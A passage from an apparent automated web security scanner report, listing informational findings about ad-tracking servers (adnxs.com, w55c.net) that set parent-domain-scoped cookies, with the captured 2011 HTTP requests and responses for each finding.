GET /ping_match.gif?ei=PUBMATIC&rurl=http%3A//image2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw%26piggybackCookie%3Duid%3A_wfivefivec_ HTTP/1.1
Host: i.w55c.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: wfivefivec=0892d3fc-c93f-4985-8ab2-420c545c19b6

Response

HTTP/1.1 302 Found
Date: Thu, 21 Jul 2011 18:00:58 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=0892d3fc-c93f-4985-8ab2-420c545c19b6;Path=/;Domain=.w55c.net;Expires=Sat, 20-Jul-13 18:00:58 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:0892d3fc-c93f-4985-8ab2-420c545c19b6
Via: 1.1 mdw061003 (MII-APC/2.0)
Content-Type: text/plain

10.64. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Fri, 21-Oct-2011 04:48:48 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEhzW%<rg(XV)`CZ8D]cc2F!S!.[<DRlcnF3$Kcow-b$Plk0FtTHN).Hx3p<6l*qK!FRJrec2]W*t5#ffE7YE>g0fYyZle8l>u-*MF2f>23PSzP3W2t:ub2ir03B40; path=/; expires=Fri, 21-Oct-2011 04:48:48 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=ZmZmZmZm8T9mZmZmZmbxPwAAAGBmZgZAZmZmZmZm8T9mZmZmZmbxP3DNeskeDGAIg472aqBQblqsUipOAAAAABUbAAC1AAAANQEAAAIAAACEGAIA0WMAAAEAAABVU0QAVVNEACwB-gB7CXIAkgUBAgUCAQQAAAAA_x9WawAAAAA.&tt_code=&udj=uf%28%27a%27%2C+3338%2C+1311396524%29%3Buf%28%27r%27%2C+137348%2C+1311396524%29%3Bppv%282932%2C+%27603495676436467056%27%2C+1311396524%2C+1311482924%2C+15498%2C+25553%29%3B&cnd=!dhztaQiKeRCEsQgYACDRxwEwADj7EkAASLUCUABYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAEBqAEDsAEAuQFmZmZmZmbxP8EBZmZmZmZm8T_JATMzMzMzM_c_2QEAAAAAAADwP-ABAA..&ccd=!KgQoHwiKeRCEsQgY0ccBIAA.&referrer=http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx&pp=TipSrAALSl8K2ldaSNNYxQbWAFR3Cl1C_LUm8w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNq8irFIqTt-ULdqu6QbFsc3GBO_675oCp439xBrr2o6PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDQzNzA0MTk0MjI5Njk0sgENd293LmN1cnNlLmNvbboBCjMwMHgyNTBfYXPIAQnaAURodHRwOi8vd293LmN1cnNlLmNvbS9kb3dubG9hZHMvd293LWFkZG9ucy9kZXRhaWxzL3Jhd3Itb2ZmaWNpYWwuYXNweJgCtAbAAgTIAquCpQ6oAwHoA6cH6APuBPUDAAAATIAGra7Dz7qYhvPYAQ%26num%3D1%26sig%3DAOD64_1VGqpwOh_lmh8Pqzzx-UqDAmOUWA%26client%3Dca-pub-7443704194229694%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: uuid2=6516234360771219075; anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEhzW%<rg(XV)`CZ8D]cc2F!S!.[<DRlcnF3$Kcow-b$Plk0FtTHN).Hx3p<6l*qK!FRJrec2]W*t5#ffE7YE>g0fYyZle8l>u-*MF2f>23PSzP3W2t:ub2ir03B40; icu=ChII6a4DEAoYASABKAEwqqWp8QQQqqWp8QQYAA..; sess=1; acb947061=s/eVn208WM06A2M>bPMvp$-`*?enc=ZmZmZmZm8T_vp8ZLN4nsPwAAAAAAAAhA76fGSzeJ7D9mZmZmZmbxP490rikeOklRg472aqBQblqqUipOAAAAAEgoCADwAgAANQEAAAIAAACEGAIAQCoBAAEAAABVU0QAVVNEACwB-gDoKwAA6AUBAgUCAQUAAAAAuSDDuQAAAAA.&tt_code=idgt.curse&udj=uf%28%27a%27%2C+3338%2C+1311396522%29%3Buf%28%27r%27%2C+137348%2C+1311396522%29%3Bppv%282932%2C+%275857276691594769551%27%2C+1311396522%2C+1311482922%2C+15498%2C+76352%29%3B&cnd=!Xx6HCwiKeRCEsQgYACDA1AQwADjoV0AASLUCUMjQIFgAYEtoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQC5AWZmZmZmZvE_wQFmZmZmZmbxP8kBMzMzMzMz9z_ZAQAAAAAAAPA_4AEA&ccd=!KQQQHwiKeRCEsQgYwNQEIAA.

Response

10.65. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Fri, 21-Oct-2011 04:48:55 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://cms.quantserve.com/dpixel?eid=5&id=$UID HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: uuid2=6516234360771219075; anj=Kfu=8fG5`$cvjr/?0P(*AuB-u**g1:XIF)WEhzW%<rg(XV)`CZ8D]cc2F!S!.[<DRlcnF3$Kcow-b$Plk0FtTHN).Hx3p<6l*qK!FRJrec2]W*t5#ffE7YE>g0fYyZle8l>u-*MF2f>23PSzP3W2t:ub2ir03B40; icu=ChII6a4DEAoYASABKAEwqqWp8QQQqqWp8QQYAA..; sess=1; acb947061=s/eVn208WM06A2M>bPMvp$-`*?enc=ZmZmZmZm8T_vp8ZLN4nsPwAAAAAAAAhA76fGSzeJ7D9mZmZmZmbxP490rikeOklRg472aqBQblqqUipOAAAAAEgoCADwAgAANQEAAAIAAACEGAIAQCoBAAEAAABVU0QAVVNEACwB-gDoKwAA6AUBAgUCAQUAAAAAuSDDuQAAAAA.&tt_code=idgt.curse&udj=uf%28%27a%27%2C+3338%2C+1311396522%29%3Buf%28%27r%27%2C+137348%2C+1311396522%29%3Bppv%282932%2C+%275857276691594769551%27%2C+1311396522%2C+1311482922%2C+15498%2C+76352%29%3B&cnd=!Xx6HCwiKeRCEsQgYACDA1AQwADjoV0AASLUCUMjQIFgAYEtoAHAAeACAAQCIAQCQAQGYAQGgAQGoAQOwAQC5AWZmZmZmZvE_wQFmZmZmZmbxP8kBMzMzMzMz9z_ZAQAAAAAAAPA_4AEA&ccd=!KQQQHwiKeRCEsQgYwNQEIAA.

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 24-Jul-2011 04:48:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Fri, 21-Oct-2011 04:48:55 GMT; domain=.adnxs.com; HttpOnly
Location: http://cms.quantserve.com/dpixel?eid=5&id=6516234360771219075
Date: Sat, 23 Jul 2011 04:48:55 GMT
Content-Length: 0

10.66. http://ib.adnxs.com/getuidnb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:58 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:$UID HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:00:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:58 GMT; domain=.adnxs.com; HttpOnly
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:6516234360771219075
Date: Thu, 21 Jul 2011 18:00:58 GMT
Content-Length: 0

10.67. http://ib.adnxs.com/if previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/if

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; path=/; expires=Wed, 19-Oct-2011 18:01:46 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/ HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA; acb731211=5_[r^208WM^9#a*>bPMvSH0.@?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPzXHfZcqv-B6g472aqBQblpUaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAA_RABAgUCAQUAAAAApyCfkQAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271252%29%3Buf%28%27c%27%2C+39654%2C+1311271252%29%3Buf%28%27r%27%2C+425550%2C+1311271252%29%3Bppv%281279%2C+%278854287057061529397%27%2C+1311271252%2C+1311876052%2C+39654%2C+24039%29%3Bppv%285150%2C+%278854287057061529397%27%2C+1311271252%2C+1311357652%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA

Response

10.68. http://ib.adnxs.com/mapuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)xXCcmT^h15-w4[Bu$WQPBhL+^enULNYjjhTOBOJr^%3<o$NF4Sg'%CA8d2D63D#zt#CnrFfsL'se*`*n!; path=/; expires=Wed, 19-Oct-2011 18:00:53 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11fda490648f83c&seg_code=bz.25&ord=1311271251 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

10.69. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
icu=ChEIz34QChgDIAMoAzCO5qHxBBCO5qHxBBgC; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
acb969899=5_[r^XI()v^9#a*>bPMv<tqGY?enc=AAAAAAAA8D_NzMzMzMzsPwAAAMDMzARAzczMzMzM7D8AAAAAAADwP9KF7IzQcFRhg472aqBQbloOcyhOAAAAAAw8AwA3AQAA3QEAAAIAAABNfgYA510AAAEAAABVU0QAVVNEAKAAWAIlDQAAXQwBAgUCAQUAAAAAvSHLUAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311273742%29%3Buf%28%27c%27%2C+39654%2C+1311273742%29%3Buf%28%27r%27%2C+425549%2C+1311273742%29%3Bppv%281279%2C+%277013354560742524370%27%2C+1311273742%2C+1311878542%2C+39654%2C+24039%29%3Bppv%285150%2C+%277013354560742524370%27%2C+1311273742%2C+1311360142%2C+39654%2C+24039%29%3B&cnd=!wRzA7QjmtQIQzfwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!cwVkLQjmtQIQzfwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG6kGcvjr/?0P(*AuB-u**g1:XIDv6EhzW%<rg(XV)`CZ8D]cc=P#sv.YU8([jc)h`pkhkA<7Rq^*hF#*/D]^!w7Nfw7w826zPtJ>b4b!'q=o9Pq(vZVMDwujiuiG!0[R/9RD+i; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=160x600&imp_id=cm-10109720508_1311273739,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2Flanding%2Fpool&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10109720508_1311273739%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-cm.games_h-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Bord1%3D141338%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.games_h%3Bbtg%3Dbz.25%3Bord%3D467262788%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`EhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?WerkXHFIP'qdxsQ<=Yls'k00(-!eqSrIt<; icu=ChEIz34QChgBIAEoATDU0qHxBBDU0qHxBBgA

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgDIAMoAzCO5qHxBBCO5qHxBBgC; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb969899=5_[r^XI()v^9#a*>bPMv<tqGY?enc=AAAAAAAA8D_NzMzMzMzsPwAAAMDMzARAzczMzMzM7D8AAAAAAADwP9KF7IzQcFRhg472aqBQbloOcyhOAAAAAAw8AwA3AQAA3QEAAAIAAABNfgYA510AAAEAAABVU0QAVVNEAKAAWAIlDQAAXQwBAgUCAQUAAAAAvSHLUAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311273742%29%3Buf%28%27c%27%2C+39654%2C+1311273742%29%3Buf%28%27r%27%2C+425549%2C+1311273742%29%3Bppv%281279%2C+%277013354560742524370%27%2C+1311273742%2C+1311878542%2C+39654%2C+24039%29%3Bppv%285150%2C+%277013354560742524370%27%2C+1311273742%2C+1311360142%2C+39654%2C+24039%29%3B&cnd=!wRzA7QjmtQIQzfwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!cwVkLQjmtQIQzfwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6kGcvjr/?0P(*AuB-u**g1:XIDv6EhzW%<rg(XV)`CZ8D]cc=P#sv.YU8([jc)h`pkhkA<7Rq^*hF#*/D]^!w7Nfw7w826zPtJ>b4b!'q=o9Pq(vZVMDwujiuiG!0[R/9RD+i; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:42:22 GMT
Content-Length: 424

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10109720508_1311273739,11fda490648f83c,games,ax.80-cm.games_h-bz.25;;cmw=ow
...[SNIP]...

10.70. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
icu=ChEIz34QChgCIAIoAjCO5qHxBBCO5qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
acb830793=5_[r^kI/7ZdzkzB7=/Cb<tqGY?enc=bYlccAb_6z98SFOYUjLpPwAAAMDMzARAfEhTmFIy6T9uiVxwBv_rP-_NrhooA3Y_g472aqBQbloOcyhOAAAAAAw8AwA3AQAAZAAAAAIAAAC2awgA510AAAEAAABVU0QAVVNEANgCWgCqAQAAiBABAgUCAQUAAAAAcCHMDAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+27%2C+1311273742%29%3Buf%28%27r%27%2C+551862%2C+1311273742%29%3Bppv%2882%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2884%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2811%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2882%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3Bppv%2884%2C+%274572845942422556143%27%2C+1311273742%2C+1321641742%2C+66647%2C+24039%29%3B&cnd=!6R9uLQjXiAQQttchGAAg57sBMAM4qgNAAEhkUIz4DFgAYEtoAHAAeACAAQCIAQCQAQGYAQGgAQSoAQOwAQC5AQHJSSsG_-s_wQEByUkrBv_rP8kBCtejcD0K8z_ZAQAAAAAAAPA_4AHhHQ..&ccd=!BQXcKAjXiAQQttchGOe7ASAA&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66647; path=/; expires=Fri, 22-Jul-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8MLb?.YT-A[C-9NtjX!!g[P's06h<>c)B@V8I%-UY1%%5; path=/; expires=Wed, 19-Oct-2011 18:42:22 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=728x90&imp_id=cm-10101735942_1311273740,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10101735942_1311273740%2C11fda490648f83c%2Cnoc%2Cax.{PRICEBUCKET}-cm.games_h-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D504647%3Bcontx%3Dnoc%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.games_h%3Bbtg%3Dbz.25%3Bord%3D800189183%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
